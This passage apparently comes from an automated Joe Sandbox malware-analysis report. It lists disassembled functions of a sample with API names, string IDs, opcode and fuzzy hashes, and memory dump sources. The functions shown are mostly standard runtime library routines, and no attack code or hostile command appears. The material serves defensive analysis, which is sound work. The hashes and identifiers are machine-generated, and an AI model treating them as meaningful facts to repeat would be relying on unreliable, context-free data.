                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecrefGetfacetLockitLockit::__memmove_sstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                      • String ID: @$tD@
                                                      • API String ID: 3492058185-11574304
                                                      • Opcode ID: cf7adbc5d9ec3d001f641b745c3e99cee1f41988edb4570db18dcf83b537e01c
                                                      • Instruction ID: e66eee7cdb8491e320dbef61940ae8eb7e2dcf3097fb7f503c6db819d0cb9457
                                                      • Opcode Fuzzy Hash: cf7adbc5d9ec3d001f641b745c3e99cee1f41988edb4570db18dcf83b537e01c
                                                      • Instruction Fuzzy Hash: B9A118B19045489FCB04DF98D9949EFBBB6FF89304F14816AF809AB291D738AD41CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407000 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Fputc$H_prolog3_
                                                      • String ID:
                                                      • API String ID: 2569218679-3916222277
                                                      • Opcode ID: de91953101acbc44e1d310cac54fae7faa9dbb76a8dcf24a5b2db7216382a998
                                                      • Instruction ID: b4e795e81ba0f384b39f435076cc416af70851788b982e62e4bde9ebe7ecbe14
                                                      • Opcode Fuzzy Hash: de91953101acbc44e1d310cac54fae7faa9dbb76a8dcf24a5b2db7216382a998
                                                      • Instruction Fuzzy Hash: 3F51A132D046049BCF14EBA5C8819EEB7B5AF44308F10863FE552BB2C1EB78B945CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004045F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: swprintf
                                                      • String ID: $$$$l
                                                      • API String ID: 233258989-1469801561
                                                      • Opcode ID: 81508c13c09cac1ccf712ac570159a650bf49248a5af5d5979e17bf754c8769d
                                                      • Instruction ID: aa0f18b80fc7a9f2d92bbd37f80208c52a3ee6b9eaaf6078140316b54b9edd15
                                                      • Opcode Fuzzy Hash: 81508c13c09cac1ccf712ac570159a650bf49248a5af5d5979e17bf754c8769d
                                                      • Instruction Fuzzy Hash: 4D516FB090011DDBDF04DF54E954BEE7B74BB85304F0081AAEA98A32C1DB3D9A66CF19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404830 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: swprintf
                                                      • String ID: $$$$l
                                                      • API String ID: 233258989-1469801561
                                                      • Opcode ID: acd02476111f86e765190ddbf83907a917aa928f21aa2e23e9928153b587302a
                                                      • Instruction ID: a63e1bfa150e7ce5171a14b21a6959bff2ffc078fdb501bc2cf68c016ce1526f
                                                      • Opcode Fuzzy Hash: acd02476111f86e765190ddbf83907a917aa928f21aa2e23e9928153b587302a
                                                      • Instruction Fuzzy Hash: C3517FB190011DDBDF14DF65E955BEE7BB4BF84304F00C0AAE698A22C1DB389A65CF19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040F050 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040821B), ref: 0040F055
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040F065
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      • Opcode ID: 0dd5922ed1fb3e490399ce4ea082e3a32af0b3ed450efd57ad338f590197e941
                                                      • Instruction ID: 289a68664ee7536265c6ad9e1225aca758fc314bb89a58f49c7374c4b837510d
                                                      • Opcode Fuzzy Hash: 0dd5922ed1fb3e490399ce4ea082e3a32af0b3ed450efd57ad338f590197e941
                                                      • Instruction Fuzzy Hash: A2F03020B00A09D2DF305BF1BC0A6AF7EB8BB8474AF9205B19191B04D6DF349079D25A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004078D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004078DB
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004078F8
                                                        • Part of subcall function 0040784D: std::runtime_error::runtime_error.LIBCPMT ref: 00407858
                                                      • __CxxThrowException@8.LIBCMT ref: 00407906
                                                        • Part of subcall function 0040898B: RaiseException.KERNEL32(?,?,0040A2C1,00403EC3,?,?,?,?,0040A2C1,00403EC3,00422E30,0047C638,00403EC3,00000000,00000000), ref: 004089CD
                                                      Strings
                                                      • invalid string position, xrefs: 004078E0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                      • String ID: invalid string position
                                                      • API String ID: 3299838469-1799206989
                                                      • Opcode ID: ed4c9f935dc7c7cebb853a8f5691122ed74c648b15ec1b0886c0068f908fe75c
                                                      • Instruction ID: 46b646f91d882e346139905f3a9979d5a9ca6e0e2cd2a47dc3d13da73bee445c
                                                      • Opcode Fuzzy Hash: ed4c9f935dc7c7cebb853a8f5691122ed74c648b15ec1b0886c0068f908fe75c
                                                      • Instruction Fuzzy Hash: 83D0EC72A4011897CB00EAD1C946FEDB378AB14314F54543AE210760C2DBBC5608866A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406C88 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00406C8F
                                                      • _fgetc.LIBCMT ref: 00406DC5
                                                        • Part of subcall function 004057C0: std::_String_base::_Xlen.LIBCPMT ref: 004057DA
                                                      • _memcpy_s.LIBCMT ref: 00406D8A
                                                      • _ungetc.LIBCMT ref: 00406E10
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                      • String ID:
                                                      • API String ID: 9762108-0
                                                      • Opcode ID: fe64a8a85a08b37e836de9af999e8eedad922a2e6ba66a5282aa81c98830a394
                                                      • Instruction ID: 17aebdebd0a5133c384ad6a495e56626dbf40851730fc18f96c5588efa08ec70
                                                      • Opcode Fuzzy Hash: fe64a8a85a08b37e836de9af999e8eedad922a2e6ba66a5282aa81c98830a394
                                                      • Instruction Fuzzy Hash: 9451B172A042089FDB14EBB5C8509EEB7B8EF48314B61453FE053B72C1EA38E915CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00418228 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041825C
                                                      • __isleadbyte_l.LIBCMT ref: 00418290
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00411001,?,00000000,00000000,?,?,?,?,00411001,00000000,?), ref: 004182C1
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00411001,00000001,00000000,00000000,?,?,?,?,00411001,00000000,?), ref: 0041832F
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 3b948e6817b72b12b4334545890c1915b0aaf1950ae015847cc768e79634f568
                                                      • Instruction ID: 74007f69de2bab3946e377790a4a8f287d31041a30969490a9c96c42d01eff20
                                                      • Opcode Fuzzy Hash: 3b948e6817b72b12b4334545890c1915b0aaf1950ae015847cc768e79634f568
                                                      • Instruction Fuzzy Hash: 4B31BF31A00645EFCF22DFA4C8849FE3BA5AF02310B1849AEE4659B291DB34DD81DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BB27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408845
                                                        • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408855
                                                      • __getptd.LIBCMT ref: 0040BB36
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __getptd.LIBCMT ref: 0040BB44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                      • String ID: csm
                                                      • API String ID: 803148776-1018135373
                                                      • Opcode ID: c28711abf6c04238348f1cf2008a3eb01f2e0dea84089cfe500ac4074473000b
                                                      • Instruction ID: 21e0c6e43c4f5b58ed6336fa1e07c5e3332ec40426277922b29aebc454435a62
                                                      • Opcode Fuzzy Hash: c28711abf6c04238348f1cf2008a3eb01f2e0dea84089cfe500ac4074473000b
                                                      • Instruction Fuzzy Hash: 330128358017058BDF24AF22C444AAEBBB5EF10311F54493FE44176AD6CB3DA985DA8D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%